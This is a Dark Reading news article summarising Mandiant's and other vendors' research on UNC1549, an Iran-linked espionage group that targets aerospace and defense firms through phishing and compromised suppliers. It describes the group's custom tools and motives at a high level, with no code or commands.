Iran-Nexus Threat Actor UNC1549 Takes Aim at Aerospace - Dark Reading

CYBERSECURITY OPERATIONS ENDPOINT SECURITY THREAT INTELLIGENCE CYBERATTACKS & DATA BREACHES NEWS Iran-Nexus Threat Actor UNC1549 Takes Aim at Aerospace Researchers say Israel remains a central focus, with UNC1549 targeting aerospace and defense entities in the US, the UAE, Qatar, Spain, and Saudi Arabia. Alexander Culafi,Senior News Writer,Dark Reading November 18, 2025 5 Min Read SOURCE: SYLVAIN OLIVEIRA VIA ALAMY STOCK PHOTO An Iran-nexus threat actor known for espionage has been targeting organizations in the aerospace sector. Researchers for Google Cloud's Mandiant said as much in a Nov. 17 blog post dedicated to a threat actor tracked as UNC1549. Google previously reported on the actor, which is thought to overlap with Iranian Revolutionary Guard Corps (IRGC)-linked group Tortoiseshell, early last year. At the time, Mandiant reported the group was compromising systems at aerospace and defense firms across multiple countries, including Israel and the United Arab Emirates. In Mandiant's latest blog post, researchers cover tactics, techniques, and procedures (TTPs) observed in incidents attributed to UNC1549 Mandiant has responded to since mid-2024.  Google's Larsen says that while Israel remains a central focus, UNC1549's targeting has expanded to include more organizations in US, the UAE, Qatar, Spain, and Saudi Arabia. "We are seeing a broadening of their operational scope beyond just direct military rivals. They are targeting sectors like technology, hospitality, and transportation, often using those intrusions to leverage trusted relationships and hop into their ultimate targets in the aerospace and defense sectors," he explains. Related:Why Stryker's Outage Is a Disaster Recovery Wake-Up Call Adam Meyers, CrowdStrike's senior vice president of counter adversary, tells Dark Reading that in the case of this threat actor in particular (which CrowdStrike tracks as "Imperial Kitten"), the security vendor has seen it expand its infrastructure and ramp up espionage activity in alignment with the interests of the IRGC since this past summer.  "Their campaigns often use job-themed phishing lures to compromise victims and deliver malicious payloads. Previous operations have targeted Western countries, as well as Israel, Saudi Arabia, and the UAE, with a wide range of industries in scope — including defense, hospitality, finance, transportation, and technology." ESET senior threat intelligence analyst Adam Burgher, meanwhile, says ESET has observed the actor (which it calls "GalaxyGato") targeting Israel and Greece for the past six months. The US Department of Homeland Security warned in June that Iranian threat actors or hacktivists could target US-based critical infrastructure operators. And in recent months, Iran-linked attackers have conducted a wide range of threat campaigns targeting everything from Europe to telecommunications firms.  UNC1549's Continued Onslaught Against Aerospace Mandiant's post, authored by Mohamed El-Banna, Daniel Lee, Mike Stokkel, and Josh Goddard, asserts that since the middle of last year, UNC1549 has targeted organizations in aerospace, aviation, and defense using a sophisticated approach. Related:White House Cyber Strategy Prioritizes Offense Sometimes, attackers would craft spear-phishing attacks designed to steal credentials or deliver malware to the target. Other times, UNC1549 would first compromise a third-party supplier or business partner and then exploit that trust to go after the main target.  "The latter technique is particularly strategic when targeting organizations with high security maturity, such as defense contractors. While these primary targets often invest heavily in robust defenses, their third-party partners may possess less stringent security postures," the blog post read. "This disparity provides UNC1549 a path of lesser resistance, allowing them to circumvent the primary target's main security controls by first compromising a connected entity." The actor also uses sophisticated post-exploitation tactics, such as stealing source code to use for lookalike domains in future spear-phishing campaigns and abusing service ticketing systems to trick employees into giving up sensitive credentials.  Additionally, UNC1549 would use a series of custom tools both to open backdoors and to maintain persistence. Some tools the research highlighted include a C++ backdoor for communicating with command-and-control (C2) infrastructure tracked as Twostroke; custom tunneller Lightrail; shell command executor, system info enumerator, and file manager Deeproot; and a tool named DCSyncer.Slick, which mimics the legitimate DCSync Active Directory replication feature in order to "extract NTLM password hashes directly from the domain controllers," Mandiant wrote. Related:Software Development Practices Help Enterprises Tackle Real-Life Risks To avoid defenses, attackers would delete utilities and other forensic artifacts. They also "repeatedly used SSH reverse tunnels from victim hosts back to their infrastructure, a technique that helped hide their activity from [endpoint detection and response] agents installed on those systems." Why UNC1549 Targets Aerospace Although Iran targets many sectors and areas of the world to further its geopolitical interests, it is notable that Mandiant's tracking of UNC1549 involves campaigns targeting a narrow range of verticals.  The post's authors stated that the threat actor's operations appear "strongly motivated by espionage," citing extensive data collection from victim networks. Google saw UNC1549 steal sensitive information such as emails, network and IT documentation, and intellectual property. Austin Larsen, principal threat analyst for the Google Threat Intelligence Group, tells Dark Reading that the threat actor seems primarily motivated by strategic intelligence gathering rather than something like destructive pre-positioning. While their actions point to a goal of acquiring proprietary and military secrets, Larsen says another major goal is to use compromised aerospace and defense firms as a vehicle to target other valuable organizations. "A major driver for targeting this specific vertical is the ability to use these organizations as pivot points. We see them exploiting trusted connections with third-party suppliers to reach high-value targets, often compromising smaller vendors to bypass the robust defenses of major defense contractors," Larson says.  On the military intelligence front, Jeremy Makowski, senior security researcher at Rapid7, says aerospace organizations are especially valuable to Iran because gained intel can "significantly speed up progress in areas where Tehran struggles to legally obtain advanced technology." "Militarily, it helps compensate for an outdated air force and limited access to modern aircraft. Information on propulsion, radar systems, satellite technologies, and precision-guidance components directly benefits Iran's expanding missile and drone programs, fields where even minor improvements can shift the strategic balance. But the value isn't purely military," he says. "Aerospace espionage enables Iran to identify restricted components, track global suppliers, and circumvent sanctions through covert procurement networks. It also supports political objectives by showcasing technological advancement to domestic audiences, signaling deterrence abroad, and equipping regional proxy groups with more capable systems." About the Author Alexander Culafi Senior News Writer, Dark Reading Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere. In his spare time, Alex hosts the weekly Nintendo podcast Talk Nintendo Podcast and works on personal writing projects, including two previously self-published science fiction novels. More Insights Industry Reports Frost Radar™: Non-human Identity Solutions 2026 CISO AI Risk Report The ROI of AI in Security Cybersecurity Forecast 2026 ThreatLabz 2025 Ransomware Report Access More Research Webinars Building a Robust SOC in a Post-AI World Retail Security: Protecting Customer Data and Payment Systems Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models More Webinars You May Also Like CYBERSECURITY OPERATIONS Microsoft Will Bundle Security Copilot With M365 Enterprise Licenses by Jeffrey Schwartz DEC 12, 2025 CYBERSECURITY OPERATIONS NIST Enhances Security Controls for Improved Patching by Arielle Waldman SEP 02, 2025 CYBERSECURITY OPERATIONS Women Who 'Hacked the Status Quo' Aim to Inspire Security Careers by Elizabeth Montalbano, Contributing Writer JUL 16, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice CYBERSECURITY OPERATIONS Why Stryker's Outage Is a Disaster Recovery Wake-Up Call byJai Vijayan MAR 12, 2026 5 MIN READ APPLICATION SECURITY Microsoft Patches 83 CVEs in March Update byJai Vijayan MAR 11, 2026 4 MIN READ THREAT INTELLIGENCE Commercial Spyware Opponents Fear US Policy Shifting byRob Wright MAR 12, 2026 9 MIN READ Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Building a Robust SOC in a Post-AI World THURS, MARCH 19, 2026 AT 1PM EST Retail Security: Protecting Customer Data and Payment Systems THURS, APRIL 2, 2026 AT 1PM EST Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need WED, APRIL 1, 2026 AT 1PM EST Securing Remote and Hybrid Work Forecast: Beyond the VPN TUES, MARCH 10, 2026 AT 1PM EST AI-Powered Threat Detection: Beyond Traditional Security Models WED, MARCH 25, 2026 AT 1PM EST More Webinars White Papers Autonomous Pentesting at Machine Speed, Without False Positives Fixing Organizations' Identity Security Posture Best practices for incident response planning Industry Report: AI, SOC, and Modernizing Cybersecurity The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Explore More White Papers GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE